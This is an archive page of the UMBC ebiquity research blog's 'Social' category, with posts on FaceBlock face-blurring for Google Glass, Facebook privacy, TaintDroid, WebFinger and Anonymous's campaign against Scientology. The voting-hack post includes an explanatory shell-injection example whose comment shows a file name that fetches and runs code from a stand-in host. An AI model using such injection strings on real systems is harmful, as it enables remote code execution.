UMBC ebiquity

Archive for the 'Social' Category

Do not be a Gl***hole, use Face-Block.me!

March 27th, 2014, by Prajit Kumar Das, posted in Ebiquity, Google, Mobile Computing, Policy, Semantic Web, Social, Wearable Computing

If you are a Google Glass user, you might have been greeted with concerned looks or raised eyebrows in public places. There has been a lot of chatter on the “interweb” regarding the loss of privacy that results from people taking your picture with Glass without notice. Google Glass has simplified photography, but, as often happens with revolutionary technology, people are worried about its potential misuse.

FaceBlock helps protect the privacy of the people around you by allowing them to specify whether or not they want to be included in your pictures. This new application, developed through a collaboration between researchers from the Ebiquity Research Group at the University of Maryland, Baltimore County and the Distributed Information Systems (DIS) group at the University of Zaragoza (Spain), selectively obscures the faces of people in pictures taken by Google Glass.

Comfort at the cost of Privacy?

As the saying goes, “The best camera is the one that’s with you.” Google Glass fits this description, as it is always available and can take a picture with a simple voice command (“Okay Glass, take a picture”). This lets users capture spontaneous life moments effortlessly. On the flip side, it raises significant privacy concerns, since pictures can be taken without one’s consent. If one does not use the device responsibly, one risks being labelled a “Glasshole”. Quite recently, a Google Glass user was assaulted by patrons who objected to her wearing the device inside a bar. The list of establishments that have banned Google Glass from their premises grows by the day. The dos and don’ts for Glass users released by Google are a good first step, but they don’t solve the problem of privacy violations.

[Image: FaceBlock running on Google Glass]

Privacy-Aware pictures to the rescue

FaceBlock takes regular pictures taken by your smartphone or Google Glass as input and converts them into privacy-aware pictures. The output is generated using a combination of face detection and face recognition algorithms. Using FaceBlock, a user can take a picture of herself and specify her policy or rule regarding pictures taken by others (in this case, “obscure my face in pictures from strangers”). The application automatically generates a face identifier for this picture; the identifier is a mathematical representation of the image. To learn more about how FaceBlock works, watch the following video.
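To make the idea concrete, here is a minimal sketch, not the FaceBlock code itself, of turning a self-portrait into a compact numeric identifier using OpenCV. A plain resize-and-normalize step stands in for the eigenface projection that FaceBlock uses, and the file name and policy wording are placeholders.

```python
# Hypothetical sketch (not the FaceBlock code): derive a compact "face
# identifier" from a self-portrait.  A plain resize-and-normalize step stands
# in for the eigenface projection that FaceBlock actually uses.
import cv2
import numpy as np

detector = cv2.CascadeClassifier(
    cv2.data.haarcascades + "haarcascade_frontalface_default.xml")

def face_identifier(image_path, size=(64, 64)):
    gray = cv2.cvtColor(cv2.imread(image_path), cv2.COLOR_BGR2GRAY)
    faces = detector.detectMultiScale(gray, scaleFactor=1.1, minNeighbors=5)
    if len(faces) == 0:
        raise ValueError("no face found in " + image_path)
    x, y, w, h = faces[0]                      # assume the first face is the owner
    crop = cv2.resize(gray[y:y + h, x:x + w], size)
    vec = crop.astype(np.float32).ravel()
    return vec / (np.linalg.norm(vec) + 1e-9)  # unit-length identifier vector

# Usage (file name and policy wording are placeholders):
# my_policy = {"identifier": face_identifier("selfie.jpg"),
#              "rule": "obscure my face in pictures from strangers"}
```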

Using Bluetooth, FaceBlock can automatically detect nearby Glass users and share this policy with them. After receiving the face identifier from a nearby user, the following post-processing steps happen on Glass, as shown in the images.

[Images: eigenface match unchecked, eigenface match checked, and the resulting blurred picture]
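Continuing the sketch above (same imports and detector), the following hedged illustration shows the kind of post-processing implied here: detect faces in the new picture, compare each one against the identifiers received over Bluetooth, and blur any match. The distance metric and threshold are assumptions, not FaceBlock’s actual parameters.

```python
# Continuation of the sketch above (same imports and detector); again only an
# illustration, with an assumed distance metric and threshold.
def make_privacy_aware(image_path, received_policies, threshold=0.5):
    """Blur any detected face that matches an identifier shared by a nearby user."""
    img = cv2.imread(image_path)
    gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
    for (x, y, w, h) in detector.detectMultiScale(gray, scaleFactor=1.1, minNeighbors=5):
        crop = cv2.resize(gray[y:y + h, x:x + w], (64, 64))
        vec = crop.astype(np.float32).ravel()
        vec /= (np.linalg.norm(vec) + 1e-9)
        for policy in received_policies:
            # A real system would use a trained recognizer rather than raw
            # pixel distance between unit vectors.
            if np.linalg.norm(vec - policy["identifier"]) < threshold:
                img[y:y + h, x:x + w] = cv2.GaussianBlur(img[y:y + h, x:x + w], (51, 51), 0)
                break
    cv2.imwrite("privacy_aware.jpg", img)

# make_privacy_aware("glass_photo.jpg", [my_policy])
```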

What promises does it hold?

FaceBlock is a proof-of-concept implementation of a system that can create privacy-aware pictures using smart devices. The spread of privacy-aware pictures could be a step in the right direction towards balancing privacy needs with the comfort afforded by technology. Thus, we can get the best out of wearable technology without being oblivious to the privacy of those around us.

FaceBlock is part of the efforts of Ebiquity and the SID group at the University of Zaragoza to build systems that preserve user privacy on mobile devices. For more details, visit http://face-block.me

Lisp bots win Planet Wars Google AI Challenge

December 2nd, 2010, by Tim Finin, posted in Agents, AI, Games, Google, Social

[Chart: top programming languages used in Planet Wars entries]
The Google AI Challenge, whose game this year was Planet Wars, had over 4000 entries that used AI and game theory to compete against one another. C at the R-Chart blog analyzed the programming languages used by the contestants, with some interesting results.

The usual suspects were the most popular languages used: Java, C++, Python, C# and PHP. The winner, Hungarian Gábor Melis, was just one of 33 contestants who used Lisp. Even less common were entries in C, but the 18 “C hippies” did remarkably well.

Blogger C wonders if Lisp was the special sauce:

Paul Graham has stated that Java was designed for “average” programmers while other languages (like Lisp) are for good programmers. The fact that the winner of the competition wrote in Lisp seems to support this assertion. Or should we see Mr. Melis as an anomaly who happened to use Lisp for this task?

New Facebook Groups Considered Harmful

October 7th, 2010, by Tim Finin, posted in Facebook, Privacy, Security, Social, Social media

Facebook has rolled out a new version of Groups, announced on the Facebook blog:

“Until now, Facebook has made it easy to share with all of your friends or with everyone, but there hasn’t been a simple way to create and maintain a space for sharing with the small communities of people in your life, like your roommates, classmates, co-workers and family.

Today we’re announcing a completely overhauled, brand new version of Groups. It’s a simple way to stay up to date with small groups of your friends and to share things with only them in a private space. The default setting is Closed, which means only members see what’s going on in a group.”

There are three kinds of groups: open, closed and secret. Open groups have public membership listings and public content. Closed groups have public membership but private content. For secret groups, both the membership and the content are private.
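As a toy illustration (not Facebook’s API), the visibility rules just described can be written down as a small table plus a lookup:

```python
# Toy encoding of the visibility rules described above (illustrative only,
# not Facebook's API).
VISIBILITY = {
    # group type: (membership visible to non-members, content visible to non-members)
    "open":   (True,  True),
    "closed": (True,  False),
    "secret": (False, False),
}

def can_see(group_type, what, is_member):
    members_public, content_public = VISIBILITY[group_type]
    if is_member:
        return True
    return members_public if what == "membership" else content_public

assert can_see("closed", "membership", is_member=False)    # who is in it: visible
assert not can_see("closed", "content", is_member=False)   # what they post: hidden
```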

A key part of the idea is that the group members collectively define who is in the group, spreading the work of setting up and maintaining the group over many people.

But a serious issue with the new Facebook group framework is that a member can unilaterally add any of their friends to a group; no confirmation is required from the person being added. This was raised as an issue by Jason Calacanis.

The constraint that one can only add Facebook friends to a group one already belongs to does offer some protection against ending up in unwanted groups (e.g., ones created by spammers). But it could still lead to problems. I could, for example, create a closed group named Crazy people who smell bad and add all of my friends without their consent. Since the group is closed rather than secret (like this one), anyone can see who is in it. Worse yet, I could then leave the group. (By the way, let me know if you want to join any of these groups.)

While this might just be an annoying prank, it could spin out of control: what might happen if one of your so-called friends adds you to a new, closed “Al-Qaeda lovers” group?

The good news is that this should be easy to fix. After all, Facebook does require confirmation for the friend relation and has a mechanism for recommending that friends like pages or try apps. Either mechanism would work for inviting others to join groups.
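Here is a minimal sketch of that invitation-with-confirmation flow; the class and method names are hypothetical, not Facebook’s:

```python
# Hypothetical sketch of the confirmation flow argued for above: an "add"
# becomes a pending invitation that takes effect only when the invitee accepts.
class Group:
    def __init__(self, name):
        self.name, self.members, self.pending = name, set(), set()

    def invite(self, inviter, invitee):
        if inviter not in self.members:
            raise PermissionError("only members may invite")
        self.pending.add(invitee)          # no membership yet

    def accept(self, invitee):
        if invitee in self.pending:
            self.pending.remove(invitee)
            self.members.add(invitee)      # membership only after consent
```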

We have started working with a new group-centric secure information sharing model being developed by Ravi Sandhu and others as a foundation for better access and privacy controls in social media systems. It seems like a great match.

See update.

How the DC Internet voting pilot was hacked

October 6th, 2010, by Tim Finin, posted in cybersecurity, Security, Social

University of Michigan professor J. Alex Halderman explains how his research group compromised the Washington DC online voting pilot in his blog post, Hacking the D.C. Internet Voting Pilot.

“The District of Columbia is conducting a pilot project to allow overseas and military voters to download and return absentee ballots over the Internet. Before opening the system to real voters, D.C. has been holding a test period in which they’ve invited the public to evaluate the system’s security and usability. … Within 36 hours of the system going live, our team had found and exploited a vulnerability that gave us almost total control of the server software, including the ability to change votes and reveal voters’ secret ballots. In this post, I’ll describe what we did, how we did it, and what it means for Internet voting.”

The problem was a shell-injection vulnerability in the procedure used to upload absentee ballots. Halderman concludes:

“The specific vulnerability that we exploited is simple to fix, but it will be vastly more difficult to make the system secure. We’ve found a number of other problems in the system, and everything we’ve seen suggests that the design is brittle: one small mistake can completely compromise its security. I described above how a small error in file-extension handling left the system open to exploitation. If this particular problem had not existed, I’m confident that we would have found another way to attack the system.”
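For readers unfamiliar with this class of bug, here is a generic, hypothetical illustration of shell injection in an upload-handling step, with a safer variant alongside it. The command and names are invented and are not the D.C. pilot’s actual code.

```python
# Hypothetical illustration of the bug class (shell injection), with invented
# names and commands; this is not the D.C. pilot's actual code.
import subprocess

def encrypt_ballot_unsafe(uploaded_name):
    # DANGEROUS: the user-supplied file name is spliced into a shell command,
    # so a name like "ballot.pdf; curl evil.example | sh" runs attacker code.
    subprocess.call("gpg --encrypt --recipient election-board " + uploaded_name,
                    shell=True)

def encrypt_ballot_safer(uploaded_name):
    # Validate the name and pass arguments as a list, so no shell is involved.
    if not uploaded_name.replace("-", "").replace("_", "").replace(".", "").isalnum():
        raise ValueError("unexpected characters in uploaded file name")
    subprocess.call(["gpg", "--encrypt", "--recipient", "election-board",
                     uploaded_name])
```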

Taintdroid catches Android apps that leak private user data

September 30th, 2010, by Tim Finin, posted in Mobile Computing, Privacy, Security, Social

Ars Technica has an article on bad Android apps, Some Android apps caught covertly sending GPS data to advertisers.

“The results of a study conducted by researchers from Duke University, Penn State University, and Intel Labs have revealed that a significant number of popular Android applications transmit private user data to advertising networks without explicitly asking or informing the user. The researchers developed a piece of software called TaintDroid that uses dynamic taint analysis to detect and report when applications are sending potentially sensitive information to remote servers.

They used TaintDroid to test 30 popular free Android applications selected at random from the Android market and found that half were sending private information to advertising servers, including the user’s location and phone number. In some cases, they found that applications were relaying GPS coordinates to remote advertising network servers as frequently as every 30 seconds, even when not displaying advertisements. These findings raise concern about the extent to which mobile platforms can insulate users from unwanted invasions of privacy.”

TaintDroid is an experimental system that “analyses how private information is obtained and released by applications ‘downloaded’ to consumer phones”. A paper on the system will be presented at the 2010 USENIX Symposium on Operating Systems Design and Implementation later this month.

TaintDroid: An Information-Flow Tracking System for Realtime Privacy Monitoring on Smartphones, William Enck, Peter Gilbert, Byung-gon Chun, Landon P. Cox, Jaeyeon Jung, Patrick McDaniel, and Anmol N. Sheth, OSDI, October 2010.

The project, Realtime Privacy Monitoring on Smartphones, has a good overview site with a FAQ and a demo.
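To make the idea of dynamic taint analysis concrete, here is a toy sketch of the concept: values read from a sensitive source carry labels that propagate through computation and are checked when they reach a network sink. TaintDroid implements this inside the Dalvik VM; the Python below is only an illustration.

```python
# Toy illustration of dynamic taint tracking; TaintDroid does this inside the
# Dalvik VM at the bytecode level, not at the application level as shown here.
class Tainted:
    def __init__(self, value, sources):
        self.value, self.sources = value, set(sources)

    def __add__(self, other):
        # Taint propagates: a result derived from tainted data stays tainted.
        if isinstance(other, Tainted):
            return Tainted(self.value + other.value, self.sources | other.sources)
        return Tainted(self.value + other, self.sources)

def read_gps():                      # taint source: sensitive location data
    return Tainted("39.25,-76.71", {"location"})

def send_to_ad_network(payload):     # taint sink: outbound network traffic
    if isinstance(payload, Tainted) and payload.sources:
        print("ALERT: app is sending", payload.sources, "to a remote server")

send_to_ad_network(read_gps() + "&device=1234")   # flags the leak
```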

This is just one example of a rich and complex area full of trade-offs. We want our systems and devices to be smarter and to really understand us — our preferences, context, activities, interests, intentions, and pretty much everything short of our hopes and dreams. We then want them to use this knowledge to better serve us — selecting music, turning the ringer on and off, alerting us to relevant news, etc. Developing this technology is neither easy nor cheap, and the developers have to profit from creating it. Extracting personal information that can be used or sold is one model — just as Google and others do to provide better ad placement on the Web.

Here’s a quote from the Ars Technica article that resonated with me.

“As Google says in its list of best practices that developers should adopt for data collection, providing users with easy access to a clear and unambiguous privacy policy is really important.”

We, and many others, are trying to prepare for the next step — when users can define their own privacy policies and these will be understood and enforced by their devices.

WebFinger: a finger protocol for the Web

August 15th, 2009, by Tim Finin, posted in Google, Semantic Web, Social, Social media, Web

Maybe WebFinger will succeed where others have failed. At what? At providing a simple handle for a person that can be easily used to get basic information that the person wants to make available. The WebFinger proposal is to use an email address as the handle.

WebFinger, aka Personal Web Discovery: we’re bringing back the finger protocol, but using HTTP this time.

Techcrunch has a post on this, Google Points At WebFinger. Your Gmail Address Could Soon Be Your ID, with some background:

“There’s some excitement around the web today among a certain group of high profile techies. What are they so excited about? Something called WebFinger, and the fact that Google is apparently getting serious about supporting it. So what is it?

It’s an extension of something called the “finger protocol” that was used in the earlier days of the web to identify people by their email addresses. As the web expanded, the finger protocol faded out, but the idea of needing a unified way to identify yourself has not. That’s why you keep hearing about OpenID and the like all the time.”

The current focus of the WebFinger group is on developing the spec for accessing a user’s metadata given their handle. Using RDF and the FOAF vocabulary should be a no-brainer for representing the metadata.
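As a hedged illustration of the “email address in, metadata out” idea, here is a minimal lookup sketch. The spec was still being worked out at the time; the query form below follows what was eventually standardized as RFC 7033, so it may not match the draft under discussion.

```python
# Hedged sketch of a WebFinger-style lookup ("email address in, metadata out").
# The spec was still in flux when this was written; the query form below follows
# what was later standardized (RFC 7033) and may not match the 2009 draft.
import json
import urllib.parse
import urllib.request

def webfinger(handle):
    domain = handle.split("@", 1)[1]
    query = urllib.parse.urlencode({"resource": "acct:" + handle})
    url = "https://" + domain + "/.well-known/webfinger?" + query
    with urllib.request.urlopen(url) as resp:
        return json.load(resp)       # resource descriptor: subject, links, ...

# Example (assumes the provider actually serves WebFinger):
# print(webfinger("alice@example.com")["links"])
```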

Apparent DDOS attacks on twitter, facebook and livejournal

August 6th, 2009, by Tim Finin, posted in Security, Social, Social media

It will be interesting to see what comes from today’s DDOS attacks on Twitter, Facebook and LiveJournal. It is certainly a show of strength by whoever controls the botnets that launched the attacks. We can only assume that the three attacks are from the same source, or at least from related sources. Some sources:

Was it a test? A demonstration? Preparation for extortion? (Nice little Internet you got there. Shame if something happened to it.)

Update 16:45: Here’s a graph from Arbor Networks (via NYT) showing a dramatic drop in traffic this morning.


[Image: Twitterfall]

Changes in FaceBook default privacy policy

July 1st, 2009, by Tim Finin, posted in Privacy, Security, Social, Social media, Web

FaceBook is changing how it manages privacy starting today. After reading last week’s post on the FaceBook blog, More Ways to Share in the Publisher, and a followup note on ReadWriteWeb, A Closer Look at Facebook’s New Privacy Options, I thought I understood: Facebook was sharing more but only for people who have made their profiles public. From the official FaceBook post:

“We’ve received some questions in the comments about default privacy settings for this beta. Nothing has changed with your default privacy settings. The beta is only open to people who already chose to set their profile and status privacy to “Everyone.” For those people, the default for sharing from the Publisher will be the same. If you have your default privacy set to anything else—such as “Friends and Networks” or “Friends Only”—you are not part of this beta.”

But the New York Times has an article, The Day Facebook Changed: Messages to Become Public by Default, that clearly says more is coming (emphasis added):

“By default, all your messages on Facebook will soon be naked visible to the world. The company is starting by rolling out the feature to people who had already set their profiles as public, but it will come to everyone soon. You’ll be able each time you publish a message to change that message’s privacy setting and from that drop down there’s a link to change your default setting.

But most people will not change the setting. Facebook messages are about to be publicly visible. A whole lot of people are going to hate it. When ex-lovers, bosses, moms, stalkers, cops, creeps and others find out what people have been posting on Facebook – the reprimand that “well, you could have changed your default setting” is not going to sit well with people.”

But it will come to everyone soon! That’s a big change if true. There will be blood.

I hope that there is some clarification soon from FaceBook. I, for one, am left confused.

Conservatism and cognitive ability are negatively correlated

April 25th, 2009, by Tim Finin, posted in GENERAL, Social

“Conservatism and cognitive ability are negatively correlated”. How’s that for a provocative opening sentence in an academic paper! Lazar Stankov of the National Institute of Education in Singapore reports this finding in a paper published earlier this year in the Elsevier journal Intelligence.

Lazar Stankov, Conservatism and cognitive ability, Intelligence, v37, n3, pp. 294-304, May-June 2009.

I’ve only scanned the paper, but it looks like a serious study. Here’s the abstract:

“Conservatism and cognitive ability are negatively correlated. The evidence is based on 1254 community college students and 1600 foreign students seeking entry to United States’ universities. At the individual level of analysis, conservatism scores correlate negatively with SAT, Vocabulary, and Analogy test scores. At the national level of analysis, conservatism scores correlate negatively with measures of education (e.g., gross enrollment at primary, secondary, and tertiary levels) and performance on mathematics and reading assessments from the PISA (Programme for International Student Assessment) project. They also correlate with components of the Failed States Index and several other measures of economic and political development of nations. Conservatism scores have higher correlations with economic and political measures than estimated IQ scores.”

The paper describes a meta-analysis based on data from three studies that employed the same set of psychological measures. Twenty-two of these measures were selected, drawn from four domains: personality, social attitudes, values, and social norms. While the paper finds strong support for the hypothesis that low cognitive ability is associated with high conservatism, it doesn’t make any statements about causality.

There is room for disagreement about the definition of conservatism and its projection onto the 22 measures. The paper gives the following narrative definition of conservatism, which is broad and dominated by personal and social aspects; it is clearly not limited to the political or economic domain.

“The Conservative syndrome describes a person who attaches particular importance to the respect of tradition, humility, devoutness and moderation as well as to obedience, self-discipline and politeness, social order, family, and national security and has a sense of belonging to and a pride in a group with which he or she identifies. A Conservative person also subscribes to conventional religious beliefs and accepts the mystical, including paranormal, experiences. The same person is likely to be less open to intellectual challenges and will be seen as a responsible “good citizen” at work and in the society while expressing rather harsh views toward those outside his or her group.”

If you can’t access the paper on Elsevier’s Science Direct digital library, you can look at three key tables here: Table 1, Table 2, and Table 3.

Is it Lindsay Lohan or your friends who make you a binge drinker?

June 23rd, 2008, by Tim Finin, posted in Agents, Social, Social media

What determines our behavior or beliefs? Are we influenced by people who are the well-known and popular leaders — political, social, religious — in our society, or by the few hundred people in our immediate social network — family, friends and co-workers? It’s reasonable to assume that it varies by domain or topic, with your music preferences falling in the first category and your spiritual orientation in the second.

Paul Ormerod and Greg Wiltshire have a preprint of a paper, ‘Binge’ drinking in the UK: a social network phenomenon (pdf), reporting on a study which suggests that binge drinking spreads through “small world” social networks rather than by imitation of influentials in a “scale free” network:

“We analyse the recent rapid growth of ‘binge’ drinking in the UK. This means the consumption of large amounts of alcohol, especially by young people, leading to serious anti-social and criminal behaviour in urban centres. We show how a simple agent-based model, based on binary choice with externalities, combined with a small amount of survey data can explain the phenomenon. We show that the increase in binge drinking is a fashion-related phenomenon, with imitative behaviour spreading across social networks. The results show that a small world network, rather than a random or scale free, offers the best description of the key aspects of the data.”
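Here is a minimal sketch of a binary-choice-with-externalities model on a small-world (Watts-Strogatz) network, in the spirit of the abstract above. The network parameters, adoption threshold and update rule are illustrative guesses, not the authors’ calibrated values.

```python
# Minimal sketch of a binary-choice-with-externalities model on a small-world
# network; parameters and the update rule are illustrative, not the authors'.
import random
import networkx as nx

def simulate(n=1000, k=8, rewire=0.1, initial=0.05, threshold=0.3, steps=50):
    g = nx.watts_strogatz_graph(n, k, rewire)            # small-world network
    drinks = {v: random.random() < initial for v in g}   # initial binge drinkers
    for _ in range(steps):
        for v in g:
            peers = list(g.neighbors(v))
            if not peers:
                continue
            share = sum(drinks[u] for u in peers) / len(peers)
            if share > threshold:      # adopt once enough of your network has
                drinks[v] = True
    return sum(drinks.values()) / n

print("final share of binge drinkers:", simulate())
```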

It’s fascinating that with the right data, simulation models can help to answer such questions.

The Missouri Mom (Lori Drew) case — Privacy Issues and New Legal Theories ?

May 22nd, 2008, by Anupam Joshi, posted in GENERAL, Privacy, Social, Social media, Web

As the news media have all reported, Lori Drew has been indicted for her role in the death of a teenager. You may recall that this person, with her daughter and her friend, created a fake MySpace account, pretended to befriend another teen, and then “dumped” her. The other teen committed suicide. Opinions are split on whether being mean to a person, even to a kid, is a criminal offense that should lead to prosecution, as opposed to societal opprobrium.

What interested me, however, is that of the four counts in the indictment, three had to do with violating the Terms of Service, in particular creating a fake profile and using this fake profile to obtain information from the server. This was done under federal laws that criminalize unauthorized access, things like hacking into a server. So does this mean that the legal theory being advanced by the US Attorney for the Central District of California is that creating a fake account on an Internet service is a criminal act whenever the provider’s ToS says you must give accurate information? Certainly many experts that USA Today talked to seem to think so. No more creating accounts with fictitious names at newspaper sites that many people can use? How about using the right name, but messing up some of the information (income level, demographics) at each site so that they can’t datamine you? Or not providing the right contact information (a@b.com), so that they can’t sell it to telemarketers? Or any of the various other things that people routinely do to provide incomplete or incorrect information? The penalty now can be criminal, not just a shutting down of access to the site concerned. Hmmm…

Anonymous, leaderless resistance and Scientology

January 26th, 2008, by Tim Finin, posted in Blogging, Social, Social media, Web

Leaderless resistance is defined on Wikipedia as

“…a political resistance strategy in which small, independent groups (covert cells) challenge an established adversary such as a government. Leaderless resistance can encompass anything from non-violent disruption and disobedience to bombings, assassinations and other violent agitation. Leaderless cells lack bidirectional, vertical command links operating without a hierarchical command.” (link)

It’s challenging to combat a leaderless resistance because one can’t use the usual methods to discover participants by exploiting the social networks of known members.

Today’s new communication infrastructures make it easier for such distributed resistance movements to take hold and grow. Information, instructions and loose coordination can be spread via Web pages, Blogs, text messages, IRCs, mailing lists, etc.

A colleague, Chris Diehl of JHU APL, suggested that the Estonian cyberwar might be a good example for studying how the blogosphere is used for this, by combining sentiment analysis, geotagging and temporal analysis. That cyber attack was the subject of a recent colloquium at APL. It’s a great idea, but one made more challenging by the fact that the attack is over, and the analysis would involve dealing with content in Estonian, which, although not exactly a low-density language, is also not one that has been extensively studied by computational linguists.

But maybe there is another example of an Internet-driven leaderless resistance, going on right now, that would be good to study as it unfolds. A group that calls itself Anonymous has announced it intends to launch an online DDOS attack on Scientology as part of a campaign against the organization.


[YouTube video: http://youtube.com/watch?v=JCbKv9yiLiQ]

The message is being spread in part by YouTube videos, starting on 21 January. There is also a Wikipedia page on Project Chanology, created on 24 January 2008, an Anonymous Scientology Widget that counts down to (I suppose) when participating members should take action, and lots of mentions on forums, blogs and other forms of social media.

Linuxhaxor has instructions for what to do, which are offered only for educational purposes.

“This guide is for information purpose only, I, the site owner, do not encourage people to go about and follow these steps or Chanology in anyway to carry this attack, or any attack to any organization or any person. If you agree to follow these steps and help them carry this attack you are fully responsible for any consequences whatsoever. This act is illegal in many states and countries. ”

Wired just ran a story on this leaderless resistance effort, Anonymous Hackers Shoot For Scientologists, Hit Dutch School Kids, and there are plenty more online.

Finally, you can track the online interest through this Blogpulse trend graph comparing Blogosphere mentions of (1) “Tom Cruise” (2) Scientology and (3) anonymous+scientology and also the Google Trends graph comparing Google searches for the same three terms. Click on the graphs to see the current results.

Mentions of scientology, tom cruise and anonymous via Blogpulse

Google searches for scientology, Tom Cruise and anonymous

Tom Cruise is in there because he’s rumored to be the second most important person in the Church of Scientology and his recent Scientology indoctrination video that surfaced on YouTube may have been the tipping point for some.
